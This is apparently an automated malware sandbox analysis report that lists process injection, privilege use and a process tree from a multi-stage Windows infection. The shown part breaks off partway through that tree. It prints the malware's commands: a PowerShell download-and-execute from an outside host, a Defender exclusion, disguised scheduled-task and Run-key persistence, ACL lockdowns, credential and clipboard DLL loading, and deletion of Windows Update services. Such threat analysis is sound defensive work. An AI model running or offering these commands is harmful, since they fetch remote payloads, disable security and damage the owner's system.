Token: SeIncBasePriorityPrivilege	3776	handdiy_3.exe
Token: SeCreatePagefilePrivilege	3776	handdiy_3.exe
Token: SeCreatePermanentPrivilege	3776	handdiy_3.exe
Token: SeBackupPrivilege	3776	handdiy_3.exe
Token: SeRestorePrivilege	3776	handdiy_3.exe
Token: SeShutdownPrivilege	3776	handdiy_3.exe
Token: SeDebugPrivilege	3776	handdiy_3.exe
Token: SeAuditPrivilege	3776	handdiy_3.exe
Token: SeSystemEnvironmentPrivilege	3776	handdiy_3.exe
Token: SeChangeNotifyPrivilege	3776	handdiy_3.exe
Token: SeRemoteShutdownPrivilege	3776	handdiy_3.exe
Token: SeUndockPrivilege	3776	handdiy_3.exe
Token: SeSyncAgentPrivilege	3776	handdiy_3.exe
Token: SeEnableDelegationPrivilege	3776	handdiy_3.exe
Token: SeManageVolumePrivilege	3776	handdiy_3.exe
Token: SeImpersonatePrivilege	3776	handdiy_3.exe
Token: SeCreateGlobalPrivilege	3776	handdiy_3.exe
Token: 31	3776	handdiy_3.exe
Token: 32	3776	handdiy_3.exe
Token: 33	3776	handdiy_3.exe
Token: 34	3776	handdiy_3.exe
Token: 35	3776	handdiy_3.exe
Token: SeShutdownPrivilege	3204	Explorer.EXE
Token: SeCreatePagefilePrivilege	3204	Explorer.EXE

Suspicious use of FindShellTrayWindow 26 IoCs

Processes:

chrome.exe

pid	process
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Explorer.EXEC2C8.exeC2C8.exeC2C8.exeD528.exeD528.exeC2C8.exeD528.exe

description	pid	process	target process
PID 3204 wrote to memory of 3304	3204	Explorer.EXE	C2C8.exe
PID 3204 wrote to memory of 3304	3204	Explorer.EXE	C2C8.exe
PID 3204 wrote to memory of 3304	3204	Explorer.EXE	C2C8.exe
PID 3304 wrote to memory of 2068	3304	C2C8.exe	C2C8.exe
PID 3304 wrote to memory of 2068	3304	C2C8.exe	C2C8.exe
PID 3304 wrote to memory of 2068	3304	C2C8.exe	C2C8.exe
PID 3304 wrote to memory of 2068	3304	C2C8.exe	C2C8.exe
PID 3304 wrote to memory of 2068	3304	C2C8.exe	C2C8.exe
PID 3304 wrote to memory of 2068	3304	C2C8.exe	C2C8.exe
PID 3304 wrote to memory of 2068	3304	C2C8.exe	C2C8.exe
PID 3304 wrote to memory of 2068	3304	C2C8.exe	C2C8.exe
PID 3304 wrote to memory of 2068	3304	C2C8.exe	C2C8.exe
PID 3304 wrote to memory of 2068	3304	C2C8.exe	C2C8.exe
PID 2068 wrote to memory of 4732	2068	C2C8.exe	icacls.exe
PID 2068 wrote to memory of 4732	2068	C2C8.exe	icacls.exe
PID 2068 wrote to memory of 4732	2068	C2C8.exe	icacls.exe
PID 2068 wrote to memory of 4872	2068	C2C8.exe	C2C8.exe
PID 2068 wrote to memory of 4872	2068	C2C8.exe	C2C8.exe
PID 2068 wrote to memory of 4872	2068	C2C8.exe	C2C8.exe
PID 4872 wrote to memory of 4496	4872	C2C8.exe	C2C8.exe
PID 4872 wrote to memory of 4496	4872	C2C8.exe	C2C8.exe
PID 4872 wrote to memory of 4496	4872	C2C8.exe	C2C8.exe
PID 4872 wrote to memory of 4496	4872	C2C8.exe	C2C8.exe
PID 4872 wrote to memory of 4496	4872	C2C8.exe	C2C8.exe
PID 4872 wrote to memory of 4496	4872	C2C8.exe	C2C8.exe
PID 4872 wrote to memory of 4496	4872	C2C8.exe	C2C8.exe
PID 4872 wrote to memory of 4496	4872	C2C8.exe	C2C8.exe
PID 4872 wrote to memory of 4496	4872	C2C8.exe	C2C8.exe
PID 4872 wrote to memory of 4496	4872	C2C8.exe	C2C8.exe
PID 3204 wrote to memory of 4520	3204	Explorer.EXE	D528.exe
PID 3204 wrote to memory of 4520	3204	Explorer.EXE	D528.exe
PID 3204 wrote to memory of 4520	3204	Explorer.EXE	D528.exe
PID 4520 wrote to memory of 4340	4520	D528.exe	D528.exe
PID 4520 wrote to memory of 4340	4520	D528.exe	D528.exe
PID 4520 wrote to memory of 4340	4520	D528.exe	D528.exe
PID 4520 wrote to memory of 4340	4520	D528.exe	D528.exe
PID 4520 wrote to memory of 4340	4520	D528.exe	D528.exe
PID 4520 wrote to memory of 4340	4520	D528.exe	D528.exe
PID 4520 wrote to memory of 4340	4520	D528.exe	D528.exe
PID 4520 wrote to memory of 4340	4520	D528.exe	D528.exe
PID 4520 wrote to memory of 4340	4520	D528.exe	D528.exe
PID 4520 wrote to memory of 4340	4520	D528.exe	D528.exe
PID 3204 wrote to memory of 3984	3204	Explorer.EXE	DA88.exe
PID 3204 wrote to memory of 3984	3204	Explorer.EXE	DA88.exe
PID 3204 wrote to memory of 3984	3204	Explorer.EXE	DA88.exe
PID 4340 wrote to memory of 4416	4340	D528.exe	D528.exe
PID 4340 wrote to memory of 4416	4340	D528.exe	D528.exe
PID 4340 wrote to memory of 4416	4340	D528.exe	D528.exe
PID 3204 wrote to memory of 1004	3204	Explorer.EXE	DC9C.exe
PID 3204 wrote to memory of 1004	3204	Explorer.EXE	DC9C.exe
PID 3204 wrote to memory of 1004	3204	Explorer.EXE	DC9C.exe
PID 4496 wrote to memory of 4400	4496	C2C8.exe	build2.exe
PID 4496 wrote to memory of 4400	4496	C2C8.exe	build2.exe
PID 4496 wrote to memory of 4400	4496	C2C8.exe	build2.exe
PID 4416 wrote to memory of 3772	4416	D528.exe	D528.exe
PID 4416 wrote to memory of 3772	4416	D528.exe	D528.exe
PID 4416 wrote to memory of 3772	4416	D528.exe	D528.exe
PID 4416 wrote to memory of 3772	4416	D528.exe	D528.exe
PID 4416 wrote to memory of 3772	4416	D528.exe	D528.exe
PID 4416 wrote to memory of 3772	4416	D528.exe	D528.exe
PID 4416 wrote to memory of 3772	4416	D528.exe	D528.exe
PID 4416 wrote to memory of 3772	4416	D528.exe	D528.exe
PID 4416 wrote to memory of 3772	4416	D528.exe	D528.exe
PID 4416 wrote to memory of 3772	4416	D528.exe	D528.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3204
- C:\Users\Admin\AppData\Local\Temp\b7c7eb65ab4b2d56462cdbd5894b4f861b3a717b01823b05a168eccc31628990.exe
  "C:\Users\Admin\AppData\Local\Temp\b7c7eb65ab4b2d56462cdbd5894b4f861b3a717b01823b05a168eccc31628990.exe"
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:4144
- C:\Users\Admin\AppData\Local\Temp\C2C8.exe
  C:\Users\Admin\AppData\Local\Temp\C2C8.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:3304
- - C:\Users\Admin\AppData\Local\Temp\C2C8.exe
    C:\Users\Admin\AppData\Local\Temp\C2C8.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:2068
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Users\Admin\AppData\Local\71d38b9a-1941-4d09-bd42-40365ca0c884" /deny *S-1-1-0:(OI)(CI)(DE,DC)
      4⤵
      Modifies file permissions
      PID:4732
  - - C:\Users\Admin\AppData\Local\Temp\C2C8.exe
      "C:\Users\Admin\AppData\Local\Temp\C2C8.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:4872
    - - C:\Users\Admin\AppData\Local\Temp\C2C8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\C2C8.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4496
      - C:\Users\Admin\AppData\Local\789ecd83-6a2d-4c4f-a5d6-f8776c88b343\build2.exe
        
        "C:\Users\Admin\AppData\Local\789ecd83-6a2d-4c4f-a5d6-f8776c88b343\build2.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4400
        
        C:\Users\Admin\AppData\Local\789ecd83-6a2d-4c4f-a5d6-f8776c88b343\build2.exe
        
        "C:\Users\Admin\AppData\Local\789ecd83-6a2d-4c4f-a5d6-f8776c88b343\build2.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:3196
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\789ecd83-6a2d-4c4f-a5d6-f8776c88b343\build2.exe" & exit
        8⤵
        
        PID:3884
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        9⤵
        Delays execution with timeout.exe
        
        PID:1096
      - C:\Users\Admin\AppData\Local\789ecd83-6a2d-4c4f-a5d6-f8776c88b343\build3.exe
        
        "C:\Users\Admin\AppData\Local\789ecd83-6a2d-4c4f-a5d6-f8776c88b343\build3.exe"
        6⤵
        Executes dropped EXE
        
        PID:4928
        
        C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
        7⤵
        Creates scheduled task(s)
        
        PID:3536
- C:\Users\Admin\AppData\Local\Temp\D528.exe
  C:\Users\Admin\AppData\Local\Temp\D528.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4520
- - C:\Users\Admin\AppData\Local\Temp\D528.exe
    C:\Users\Admin\AppData\Local\Temp\D528.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4340
  - - C:\Users\Admin\AppData\Local\Temp\D528.exe
      "C:\Users\Admin\AppData\Local\Temp\D528.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:4416
    - - C:\Users\Admin\AppData\Local\Temp\D528.exe
        
        "C:\Users\Admin\AppData\Local\Temp\D528.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        Executes dropped EXE
        
        PID:3772
      - C:\Users\Admin\AppData\Local\a9ca9354-c5f8-4c6b-b4f7-28b1560b2b71\build2.exe
        
        "C:\Users\Admin\AppData\Local\a9ca9354-c5f8-4c6b-b4f7-28b1560b2b71\build2.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4264
        
        C:\Users\Admin\AppData\Local\a9ca9354-c5f8-4c6b-b4f7-28b1560b2b71\build2.exe
        
        "C:\Users\Admin\AppData\Local\a9ca9354-c5f8-4c6b-b4f7-28b1560b2b71\build2.exe"
        7⤵
        Executes dropped EXE
        
        PID:744
      - C:\Users\Admin\AppData\Local\a9ca9354-c5f8-4c6b-b4f7-28b1560b2b71\build3.exe
        
        "C:\Users\Admin\AppData\Local\a9ca9354-c5f8-4c6b-b4f7-28b1560b2b71\build3.exe"
        6⤵
        Executes dropped EXE
        
        PID:1396
        
        C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
        7⤵
        Creates scheduled task(s)
        
        PID:2252
- C:\Users\Admin\AppData\Local\Temp\DA88.exe
  C:\Users\Admin\AppData\Local\Temp\DA88.exe
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:3984
- C:\Users\Admin\AppData\Local\Temp\DC9C.exe
  C:\Users\Admin\AppData\Local\Temp\DC9C.exe
  2⤵
  - Executes dropped EXE
  PID:1004
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 480
    3⤵
    - Program crash
    PID:5108
- C:\Users\Admin\AppData\Local\Temp\358B.exe
  C:\Users\Admin\AppData\Local\Temp\358B.exe
  2⤵
  - Executes dropped EXE
  PID:1788
- - C:\Users\Admin\AppData\Local\Temp\Player3.exe
    "C:\Users\Admin\AppData\Local\Temp\Player3.exe"
    3⤵
    - Executes dropped EXE
    PID:1116
  - - C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
      "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"
      4⤵
      Executes dropped EXE
      PID:3528
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:2444
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit
        5⤵
        
        PID:3888
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:1296
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "nbveek.exe" /P "Admin:N"
        6⤵
        
        PID:1632
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "nbveek.exe" /P "Admin:R" /E
        6⤵
        
        PID:4820
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\16de06bfb4" /P "Admin:N"
        6⤵
        
        PID:2012
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:2524
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\16de06bfb4" /P "Admin:R" /E
        6⤵
        
        PID:2080
    - - C:\Users\Admin\AppData\Local\Temp\1000156001\handdiy_3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000156001\handdiy_3.exe"
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:3776
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:64
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:2360
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        6⤵
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3224
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffa5d799758,0x7ffa5d799768,0x7ffa5d799778
        7⤵
        
        PID:4936
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1848 --field-trial-handle=1944,i,4405307812915645025,106799740093879669,131072 /prefetch:8
        7⤵
        
        PID:3960
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1760 --field-trial-handle=1944,i,4405307812915645025,106799740093879669,131072 /prefetch:8
        7⤵
        
        PID:4560
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3120 --field-trial-handle=1944,i,4405307812915645025,106799740093879669,131072 /prefetch:1
        7⤵
        
        PID:3976
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3088 --field-trial-handle=1944,i,4405307812915645025,106799740093879669,131072 /prefetch:1
        7⤵
        
        PID:1124
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1612 --field-trial-handle=1944,i,4405307812915645025,106799740093879669,131072 /prefetch:2
        7⤵
        
        PID:2468
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3580 --field-trial-handle=1944,i,4405307812915645025,106799740093879669,131072 /prefetch:1
        7⤵
        
        PID:4524
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4960 --field-trial-handle=1944,i,4405307812915645025,106799740093879669,131072 /prefetch:1
        7⤵
        
        PID:4372
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4544 --field-trial-handle=1944,i,4405307812915645025,106799740093879669,131072 /prefetch:8
        7⤵
        
        PID:420
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5092 --field-trial-handle=1944,i,4405307812915645025,106799740093879669,131072 /prefetch:8
        7⤵
        Executes dropped EXE
        
        PID:4932
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4744 --field-trial-handle=1944,i,4405307812915645025,106799740093879669,131072 /prefetch:8
        7⤵
        
        PID:4876
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5904 --field-trial-handle=1944,i,4405307812915645025,106799740093879669,131072 /prefetch:8
        7⤵
        
        PID:1480
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4732 --field-trial-handle=1944,i,4405307812915645025,106799740093879669,131072 /prefetch:8
        7⤵
        
        PID:4380
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5116 --field-trial-handle=1944,i,4405307812915645025,106799740093879669,131072 /prefetch:8
        7⤵
        
        PID:2920
    - - C:\Users\Admin\AppData\Local\Temp\1000157001\sqlcmd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000157001\sqlcmd.exe"
        5⤵
        Executes dropped EXE
        
        PID:1480
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.teamtech.info/wp-content/debug2.ps1')"
        6⤵
        
        PID:1476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.teamtech.info/wp-content/debug2.ps1')
        7⤵
        Blocklisted process makes network request
        
        PID:2252
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000157001\sqlcmd.exe" >> NUL
        6⤵
        
        PID:4208
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        7⤵
        Runs ping.exe
        
        PID:1092
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
        5⤵
        Loads dropped DLL
        
        PID:220
      - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
        6⤵
        Loads dropped DLL
        
        PID:368
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 368 -s 600
        7⤵
        Program crash
        
        PID:4376
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\clip64.dll, Main
        5⤵
        Loads dropped DLL
        
        PID:4776
- - C:\Users\Admin\AppData\Local\Temp\ss31.exe
    "C:\Users\Admin\AppData\Local\Temp\ss31.exe"
    3⤵
    - Executes dropped EXE
    PID:1804
- - C:\Users\Admin\AppData\Local\Temp\XandETC.exe
    "C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:4532
- C:\Users\Admin\AppData\Local\Temp\426D.exe
  C:\Users\Admin\AppData\Local\Temp\426D.exe
  2⤵
  - Executes dropped EXE
  PID:4624
- - C:\Users\Admin\AppData\Local\Temp\Player3.exe
    "C:\Users\Admin\AppData\Local\Temp\Player3.exe"
    3⤵
    - Executes dropped EXE
    PID:4396
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4624 -s 1456
    3⤵
    - Program crash
    PID:4408
- C:\Users\Admin\AppData\Local\Temp\4433.exe
  C:\Users\Admin\AppData\Local\Temp\4433.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1244
- - C:\Users\Admin\AppData\Local\Temp\4433.exe
    C:\Users\Admin\AppData\Local\Temp\4433.exe
    3⤵
    - Executes dropped EXE
    PID:4788
  - - C:\Users\Admin\AppData\Local\Temp\4433.exe
      "C:\Users\Admin\AppData\Local\Temp\4433.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:5000
    - - C:\Users\Admin\AppData\Local\Temp\4433.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4433.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        Executes dropped EXE
        
        PID:1028
      - C:\Users\Admin\AppData\Local\0cdf2a89-c9a3-4f89-8849-62faf5391092\build2.exe
        
        "C:\Users\Admin\AppData\Local\0cdf2a89-c9a3-4f89-8849-62faf5391092\build2.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5056
        
        C:\Users\Admin\AppData\Local\0cdf2a89-c9a3-4f89-8849-62faf5391092\build2.exe
        
        "C:\Users\Admin\AppData\Local\0cdf2a89-c9a3-4f89-8849-62faf5391092\build2.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5048
      - C:\Users\Admin\AppData\Local\0cdf2a89-c9a3-4f89-8849-62faf5391092\build3.exe
        
        "C:\Users\Admin\AppData\Local\0cdf2a89-c9a3-4f89-8849-62faf5391092\build3.exe"
        6⤵
        
        PID:4932
- C:\Users\Admin\AppData\Local\Temp\9C85.exe
  C:\Users\Admin\AppData\Local\Temp\9C85.exe
  2⤵
  - Executes dropped EXE
  PID:4268
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:5100
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
  2⤵
  PID:3484
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:4520
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:64
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:4820
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:3048
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:4872
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:2708
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2544
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3348
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4092
- - C:\Windows\System32\sc.exe
    sc stop bits
